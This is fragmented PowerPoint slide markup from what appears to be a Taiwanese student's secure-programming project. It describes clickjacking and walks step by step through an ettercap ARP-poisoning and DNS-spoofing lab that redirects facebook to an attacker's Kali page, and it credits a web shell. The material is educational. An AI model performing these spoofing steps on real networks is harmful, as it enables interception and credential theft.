              <a:t>前置作業</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1554322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BF3FE-96E5-2C1D-4A19-D958318F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Demo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>影片</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>實際可能不存在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW"/>
              <a:t>)</a:t>
            </a:r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DB879D-8A1B-B314-133D-ED967FBCB4ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046971" y="546855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https://youtu.be/T1NNvly3Gfc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="線上媒體 4" descr="安全程式設計-期末專案-clickjacking">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42606DA3-7EE6-7596-4F65-A3A90A1227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6971" y="2023148"/>
            <a:ext cx="6098058" cy="34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1AF51-1651-ED27-72BB-E3665FBA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遇到的問題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D69516-968A-A1EC-AEAA-A722AEAF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/>
              <a:t>現在的瀏覽器皆會禁止第三方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800"/>
              <a:t> Click</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800"/>
              <a:t>Jacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>可能不再容易實現</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2169036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無法取得原網站的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW"/>
              <a:t>COOKIE</a:t>
            </a:r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6480A3-8DD8-66C3-91D7-D5998EE1F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t="684" r="683" b="2494"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075727" y="1851951"/>
            <a:ext cx="8040546" cy="487294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8A676417-EAEF-BB8A-D614-87F618483426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9525965" y="2268638"/>
            <a:ext cx="891250" cy="428263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377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A9D47-384D-23E1-08E6-ABB30023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/>
              </a:rPr>
              <a:t>DNS spoofing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395496A-111E-1039-A8C2-2AF562E1F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803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甚麼是APR Spoofing?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:ea typeface="微軟正黑體"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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A0D75562-03F9-27E5-2F0F-A8E33BD55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7" y="1837245"/>
            <a:ext cx="9170067" cy="50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0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D19FF-EACC-8349-BF95-A8902C9E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網頁介紹影片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A6C085-E8EA-4215-CDB8-73E35B673074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3593070" y="5984796"/>
            <a:ext cx="525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https://youtu.be/PxRXmFCEB80</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="線上媒體 2" descr="安全程式設計-期末專案-網站導覽">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{813B2B20-A173-4068-A3B4-0FC7951CDA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593070" y="2045050"/>
            <a:ext cx="5252995" cy="39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5FFC242E-80BA-F2E2-69B8-F2C2D0D9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12" y="1862889"/>
            <a:ext cx="7227971" cy="3743826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="圖片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F3A5F2-457C-10A5-F0C8-42063596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691" y="4575008"/>
            <a:ext cx="5438775" cy="2169694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B356BBB8-7386-0874-1443-220B72483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59" y="3039226"/>
            <a:ext cx="5734050" cy="13811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1.查看主機(victim)和kali虛擬機(attacker)的IP與getway</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="框架 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFC5E5B5-866B-0ACC-EB3C-2E370C98B8C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9084807" y="3732480"/>
            <a:ext cx="1262223" cy="247790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97253EFD-A0CC-EB5B-AFA3-EC9397C2EC9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276311" y="2761932"/>
            <a:ext cx="2304961" cy="317975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51CBC0FB-FB45-1333-1BEF-C48D13FC5A13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775622" y="2378927"/>
            <a:ext cx="1332407" cy="307948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53BBBCC1-B1EE-1822-BB10-E9B94321F341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297491" y="5045927"/>
            <a:ext cx="4049538" cy="247790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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{279A7BAC-7C50-BC44-6F3D-0A42CD7365BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297491" y="5446980"/>
            <a:ext cx="4089643" cy="277868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24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FFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="微軟正黑體"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="微軟正黑體"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.在/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="微軟正黑體"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="微軟正黑體"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="微軟正黑體"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="微軟正黑體"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:ea typeface="微軟正黑體"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>etter.dns加入所要欺騙的網址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
              <a:latin typeface="Gill Sans MT"/>
              <a:ea typeface="微軟正黑體"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 4" descr="一張含有 文字, 匾牌 的圖片&#10;&#10;自動產生的描述">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A5F6CD2-6A6D-75D4-54CA-28459806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63" y="1891921"/>
            <a:ext cx="7381306" cy="47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03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3.查看原先facebook所相連的ip位址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:ea typeface="微軟正黑體"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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F758100B-7855-8CB7-E60F-66A8100A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5" y="2291331"/>
            <a:ext cx="11033930" cy="3958561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7A417B98-38E6-FB84-1AC1-3C759B037334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706986" y="2936361"/>
            <a:ext cx="2160701" cy="475253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54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600">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>4.打開ettercap，scan hosts並將getway與victim的IP作為欺騙對象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0">
              <a:ea typeface="微軟正黑體"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 4" descr="一張含有 文字, 螢幕擷取畫面, 螢幕, 屏幕、螢幕 的圖片&#10;&#10;自動產生的描述">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACF4FD26-D6A7-B81D-7FC7-10DA8318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72" y="1836974"/>
            <a:ext cx="9384826" cy="4890021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AE6D27E3-D5D9-9B15-BAC5-34358CB70147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1355625" y="6125388"/>
            <a:ext cx="3047805" cy="600357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968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5.打開插件中的DNS_spoof，並開啟ARP poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:ea typeface="微軟正黑體"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 4" descr="一張含有 文字, 螢幕擷取畫面, 螢幕, 黑色 的圖片&#10;&#10;自動產生的描述">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F87DA34-21A5-ABE1-66CC-F0F2D730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214" y="1906777"/>
            <a:ext cx="8054169" cy="4875520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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CECDF1E-A6C8-9428-A23B-C07C46A1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10" y="1910046"/>
            <a:ext cx="5467350" cy="4448175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A349FCB8-8722-A196-6986-30B47C43808E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354789" y="3589179"/>
            <a:ext cx="5504402" cy="338775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AF5E183C-D5E2-9698-CF2C-D469A85A5E37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9855905" y="2740742"/>
            <a:ext cx="1569298" cy="441135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58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6.驗證結果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:ea typeface="微軟正黑體"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 3" descr="一張含有 圖表 的圖片&#10;&#10;自動產生的描述">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA92987D-4C35-2C0E-C612-1BB2C535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8" y="1956961"/>
            <a:ext cx="7451392" cy="3057809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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BBC676E8-E69A-087C-DB51-F08EED3B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63" y="3636203"/>
            <a:ext cx="7451393" cy="3156756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A14CACF3-FA0F-947A-0805-2130FF7C08AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2981983" y="2429119"/>
            <a:ext cx="1887746" cy="384267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BE346326-757E-4E96-91DA-B93D903FC0AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114980" y="4196505"/>
            <a:ext cx="1933238" cy="350148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07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7.檢查此時getway(router)的MAC位址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:ea typeface="微軟正黑體"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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A2A9B98-858B-E8FD-3C8F-33D7F7C8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19" y="1893413"/>
            <a:ext cx="6836959" cy="1717769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="圖片 6" descr="一張含有 資料表 的圖片&#10;&#10;自動產生的描述">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA65DEFF-18B8-C003-9C3A-E7FC04E30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18" r="137" b="175"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047149" y="3727473"/>
            <a:ext cx="9043367" cy="3034260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5E2348F6-F071-0CB8-4628-60203D089F5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718730" y="2474611"/>
            <a:ext cx="5322431" cy="350148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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8B5D2FA-18F6-131B-C19C-4DC0873F7CFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6682801" y="5959340"/>
            <a:ext cx="1717149" cy="338775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DC5AD5A0-89EE-3390-1890-6087955113A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718729" y="2986401"/>
            <a:ext cx="5322431" cy="350148"/>
          </a:xfrm>
          <a:prstGeom prst="fram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93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4BDD7-0CFA-546C-BC37-AFF2AD2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8.實際上kali(attacker)上的網頁(192.168.0.102)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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F1EE065-D595-EE1B-D3B4-63529C277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44" r="132" b="234"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="942975" y="1830649"/>
            <a:ext cx="10078605" cy="49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4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8E130-0C43-6A2E-9EE7-208E4E459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參考文獻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65731D-6FED-4DB7-FC90-C2BD32AAA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359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A0C3C6D-8B6E-C2CD-8D3F-4E6A9BFE6499}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467497" y="1210961"/>
            <a:ext cx="11257005" cy="528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iThome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Day03-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深入理解網頁架構：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邦幫忙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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一起幫忙解決難題，拯救 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人的一天</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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ithelp.ithome.com.tw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/articles/10202689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Lab: Blind SQL injection with conditional responses (no date) Web Security Academy.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portswigger.net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/web-security/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-injection/blind/lab-conditional-responses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Lab: Dom XSS in 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document.write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sink using source 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location.search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(no date) Web Security Academy.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portswigger.net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/web-security/cross-site-scripting/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-based/lab-document-write-sink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Lab: Exploiting XXE using external entities to retrieve files (no date) Web Security Academy.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portswigger.net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/web-security/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xxe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/lab-exploiting-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xxe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-to-retrieve-files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Union attacks (no date) Web Security Academy.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portswigger.net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/web-security/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-injection/union-attacks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blind SQL Injection? tutorial &amp; examples: Web security academy (no date) What is Blind SQL Injection? Tutorial &amp; Examples | Web Security Academy.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portswigger.net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/web-security/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-injection/blind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clickjacking? tutorial &amp; examples: Web security academy (no date) What is Clickjacking? Tutorial &amp; Examples | Web Security Academy.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portswigger.net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/web-security/clickjacking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SQL injection? tutorial &amp; examples: Web security academy (no date) What is SQL Injection? Tutorial &amp; Examples | Web Security Academy.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portswigger.net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/web-security/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-injection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" altLang="zh-TW" sz="16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35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27581-8544-E18C-B561-BDFFC43F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err="1"/>
              <a:t>GIthub</a:t>
            </a:r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C62F0E-E8AD-0E20-9F17-539ECD735F1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2204502" y="232993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https://github.com/RutoDa/Security_Final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1A6049-4A82-46D7-D5E5-E2E119CD1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2" y="2868484"/>
            <a:ext cx="7772400" cy="38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7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6D64693-65DD-32B7-15C8-DEEFF29A9A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467497" y="1210961"/>
            <a:ext cx="11257005" cy="4050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XXE (XML external entity) injection? tutorial &amp; examples: Web security academy (no date) What is XXE (XML external entity) injection? Tutorial &amp; Examples | Web Security Academy.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portswigger.net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/web-security/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xxe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 (2022) Wikipedia.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zh.wikipedia.org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zh-tw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/XML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什麼是 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DTD (document type definition) (no date) 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什麼是 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DTD (Document Type Definition). Available at: http://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ericchiu-xml.blogspot.com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/2010/08/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dtd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-document-type-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definition.html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(Accessed: 07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資安這條路：領航新手的 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Security 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指南，以自建漏洞環境學習網站安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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(2021)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。作者：林子婷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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。新北市</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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博碩。 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r>
              <a:rPr lang="zh-TW" altLang="e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9789864348985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Arp poisoning | man-in-the-middle attack (2021) YouTube.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watch?v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=A7nih6SANYs (Accessed: 13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Hacking anyone’s browser (dangerously easy!) - DNS spoofing attack (2022) YouTube.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watch?v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=-98YGG1Y1Io (Accessed: 13 June 2023). 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spoofing attacks (2022) YouTube. Available at: https://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watch?v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW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=g-XZpTxusS8 (Accessed: 13 June 2023). </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4180975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CFB3B2C-4EE6-F0F1-D011-723EC265FC4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="2001794"/>
            <a:ext cx="11029616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產品照片皆來自愛迪達官網的照片</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400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Rating </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>照片皆來自</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>的</a:t>
            </a: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 Lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
              <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
              <a:ea typeface="BiauKa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Style.css </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>部分引用</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>web-security-academy.net/resources/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>/labsBlog.css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BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>實現</a:t>
            </a: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 Ajax </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>的</a:t>
            </a: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 JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>，參考自</a:t>
            </a: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W3school</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>web-security-academy.net</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
              <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
              <a:ea typeface="BiauKa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預設使用者頭貼，來自</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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google account</a:t>
            </a:r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得預設照片</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400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BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t>Web shell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
              </a:rPr>
              <a:t> 來自 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="BiauKai" panose="02010601000101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="BiauKai"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/flozz/p0wny-shell</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203"/>
              <a:ea typeface="BiauKa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sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203"/>
              <a:ea typeface="BiauKai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D30CA50-A05E-6F31-0557-D5076F87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系統製作參考與引用資源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30723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A27B7-906F-E3D3-41E3-82587973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資料庫設計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C651E5-FE4C-6291-6C38-A7F587D8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2" y="1954276"/>
            <a:ext cx="7772400" cy="417406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88E0C38-330F-E4FC-86AA-7B7BE5C60552}"/>
